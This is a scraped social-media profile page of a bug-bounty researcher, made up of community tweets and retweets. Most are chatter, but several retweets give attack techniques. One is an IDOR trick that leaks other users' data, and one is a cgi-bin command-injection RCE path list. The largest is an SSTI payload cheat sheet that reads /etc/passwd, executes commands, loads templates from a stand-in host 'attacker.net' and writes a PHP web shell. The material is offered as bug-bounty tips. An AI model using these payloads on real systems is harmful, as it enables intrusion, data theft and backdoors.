Prince Roy

@royzsec

Ethical Hacker | Security Researcher | Ex-GPCSSI2021 | Acknowledge By the U.S Dept , NASA , NCSC and MOD of the UK , NCIIPC India, Microsoft and more(50+)🧑‍💻

Vancouver, BC, Canada

Joined May 2020

77 Following

369 Followers

367 Posts

Pinned Tweet

Prince Roy @royzsec

over 2 years ago

Har Har Mahadev🔱❤️ Got RXSS… on @Microsoft Thanks to @ADITYASHENDE17 sir #bugbounty #bugcrowd #bughunting #hacking #hacker #webapplicationsecurity #hackerone #vulnerabilities #hackingtools #bugbountytips #cehv12

royzsec's tweet photo. Har Har Mahadev🔱❤️

Got RXSS… on @Microsoft

Thanks to @ADITYASHENDE17 sir

#bugbounty #bugcrowd #bughunting #hacking #hacker #webapplicationsecurity #hackerone #vulnerabilities #hackingtools #bugbountytips #cehv12 https://t.co/PaNUxgzdeV

130

16K

Prince Roy @royzsec

over 1 year ago

@ElonsolanaX BchUJWjWP1WHDtyHpwfQwdHWBqhEeTiyaboJKYagHeic

Prince Roy @royzsec

over 1 year ago

@ADITYASHENDE17 @ich_rish99 @hedoneism @ADITYASHENDE17 sir you still consider him as a boy 😐😐…. I don’t think so ….

210

royzsec retweeted

Tushar Verma 🇮🇳 @e11i0t_4lders0n

over 1 year ago

When life gives you pain. Go to Gym 💪🏻

Who to follow

Zhenwarx

@zhenwarx

Security Researcher | Bug Bounty Hunter | Traveler

Anon_Y0gi

@AnonY0gi

A Medico-Yogi who hacks for fun (MBBS) | vCISO @Artelus, Ex @Bugbase Triager. | Cyber Security Mentor and cybercrime investigator https://t.co/PahRwlcM2p

Salman Khan

@salman_ashlor

Cyber Security Researcher | Penetration Tester at @Pentest People LTD | ISO/IEC 27001 INFORMATION SECURITY ASSOCIATE

Prince Roy @royzsec

over 1 year ago

@Cyber_Ritik Kiya bat he sir 💪 congrats.

royzsec retweeted

Ritik Raj 🇮🇳 @Cyber_Ritik

over 1 year ago

Yeh i awarded $$$ for idor post/v4/workspace/user_id/detail I just chnage the POST to GET and change the user_id GET/v4/workspace/victim_id/detail It leaks 1000+ user workspace details like email,workspace_name,members_details and many more #BugBounty #bugbountytip

Cyber_Ritik's tweet photo. Yeh i awarded $$$ for idor

post/v4/workspace/user_id/detail

I just chnage the POST to GET and change the user_id

GET/v4/workspace/victim_id/detail

It leaks 1000+ user workspace details like email,workspace_name,members_details and many more

#BugBounty #bugbountytip https://t.co/WhVordQs0n

104

Prince Roy @royzsec

over 1 year ago

@NASA acknowledged me ☝🏻. Credit goes to @ADITYASHENDE17

royzsec retweeted

Kanhaiya Sharma

@krishnsec

almost 2 years ago

consistency is king bcoz potential is a flirt .

100

33K

Prince Roy @royzsec

almost 2 years ago

@Cyber_Ritik Congrats sir …..@Cyber_Ritik please give us some tips ….

191

Prince Roy @royzsec

almost 2 years ago

@ADITYASHENDE17 Red ❤️

royzsec retweeted

Yash___HackZ @HackzYash

almost 2 years ago

New article is published by @royzsec Cloudflare Bypass leads to RXSS[Reflected-Cross Site Scripting] in Microsoft https://t.co/f2yKdFznvb

799

Prince Roy @royzsec

about 2 years ago

@Cyber_Ritik Sir tech me something.

112

Prince Roy @royzsec

about 2 years ago

@AtharvShejwal @ADITYASHENDE17 Pesa hi pesa

royzsec retweeted

Aditya

@ADITYASHENDE17

about 2 years ago

🚀 Excited to announce the launch of our exclusive hacker gear! 💻🔒 Join me and the @kong_sec team in celebrating the release of our Merchandise for Hackers by Hackers. 🎉 Special alert: No Shipping cost, No Tax! 📦💰 Grab yours now at https://t.co/YxNagQZXut and gear up for your next hacking adventure! #CyberSecurity #HackerGear #merchandise #kongsec

ADITYASHENDE17's tweet photo. 🚀 Excited to announce the launch of our exclusive hacker gear! 💻🔒 Join me and the @kong_sec team in celebrating the release of our Merchandise for Hackers by Hackers.

🎉 Special alert: No Shipping cost, No Tax! 📦💰 Grab yours now at https://t.co/YxNagQZXut and gear up for your next hacking adventure! #CyberSecurity #HackerGear #merchandise #kongsec

10K

royzsec retweeted

Godfather Orwa 🇯🇴 @GodfatherOrwa

about 2 years ago

story of very quick RCE Target/cgi-bin/dmt/reset.cgi?db_prefix=%26id%26 You can to add this paths for ur wordlist cgi-bin/dmt/reset.cgi?db_prefix=%26id%26 cgi-bin/reset.cgi?db_prefix=%26id%26 fuzzing as well cgi-bin/FUZZ.cgi?FUZZ=%26id%26 #bugbountytips ❤️

GodfatherOrwa's tweet photo. story of very quick RCE

Target/cgi-bin/dmt/reset.cgi?db_prefix=%26id%26

You can to add this paths for ur wordlist

cgi-bin/dmt/reset.cgi?db_prefix=%26id%26

cgi-bin/reset.cgi?db_prefix=%26id%26

fuzzing as well

cgi-bin/FUZZ.cgi?FUZZ=%26id%26

#bugbountytips ❤️ https://t.co/uBkKHXoAjc

799

186

701

70K

royzsec retweeted

@TheMsterDoctor1

about 2 years ago

Happy Hunting!!!😎😎🚨🚨 SSTI (Server Side Template Injection) Generic ${{<%[%'"}}%\. {% debug %} {7*7} {{ '7'*7 }} {2*2}[[7*7]] <%= 7 * 7 %> #{3*3} #{ 3 * 3 } [[3*3]] ${2*2} @(3*3) ${= 3*3} {{= 7*7}} ${{7*7}} #{7*7} [=7*7] {{ request }} {{self}} {{dump(app)}} {{ [] .class.base.subclassesO }} {{''.class.mro()[l] .subclassesO}} for c in [1,2,3] %}{{ c,c,c }}{% endfor %} {{ []._class.base.subclasses_O }} {{['cat%20/etc/passwd']|filter('system')}} PHP {php}print "Hello"{/php} {php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php} {{dump(app)}} {{app.request.server.all|join(',')}} "{{'/etc/passwd'|file_excerpt(1,30)}}"@ {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}} {$smarty.version} {php}echo id;{/php} {Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())} Python {% debug %} {{settings.SECRET_KEY}} {% import foobar %} = Error {% import os %}{{os.system('whoami')}} #BugBounty #bugbountytips

$TheMsterDoctor1's tweet photo. Happy Hunting!!!😎😎🚨🚨 SSTI (Server Side Template Injection) Generic ${{<%[%'"}}%\. {% debug %} {7*7} {{ '7'*7 }} {2*2}[[7*7]] <%= 7 * 7 %> #{3*3} #{ 3 * 3 } [[3*3]] ${2*2} @(3*3) ${= 3*3} {{= 7*7}} ${{7*7}} #{7*7} [=7*7] {{ request }} {{self}} {{dump(app)}} {{ [] .class.base.subclassesO }} {{''.class.mro()[l] .subclassesO}} for c in [1,2,3] %}{{ c,c,c }}{% endfor %} {{ []._class.base.subclasses_O }} {{['cat%20/etc/passwd']|filter('system')}} PHP {php}print "Hello"{/php} {php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php} {{dump(app)}} {{app.request.server.all|join(',')}} "{{'/etc/passwd'|file_excerpt(1,30)}}"@ {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}} {$smarty.version} {php}echo id;{/php} {Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())} Python {% debug %} {{settings.SECRET_KEY}} {% import foobar %} = Error {% import os %}{{os.system('whoami')}} #BugBounty #bugbountytips$

644

192

443

31K

Prince Roy @royzsec

about 2 years ago

Har Har Mahadev🔱❤️‍🔥 I hope you guys will find this helpful. #BugBounty #hackerone #bugcrowd #Pentesting #hackingtools #bugbountytip #webhacking https://t.co/wlRadGsRBX

Prince Roy @royzsec

about 2 years ago

Got bounty 😖😖 #bugbountytip #bounty #hacking #CyberAttack #cyberpunk #bugbountymems #hackerone #bugcrowd #synack #intigriti

961

royzsec retweeted

Aditya

@ADITYASHENDE17

about 2 years ago

Hello everyone if you are going to attend @bsidesgoa here's something extra special: use the code 'BSIDESGOA-KONGSEC' when you register -https://t.co/xAw5R5eV1S 💼 Don’t forget to follow me on instagram for special updates #BSidesGoa #CyberSec #kongsec

Prince Roy @royzsec

about 2 years ago

@ADITYASHENDE17

Prince Roy

@royzsec

Who to follow

Last Seen Users on Sotwe

Trends for you

Most Popular Users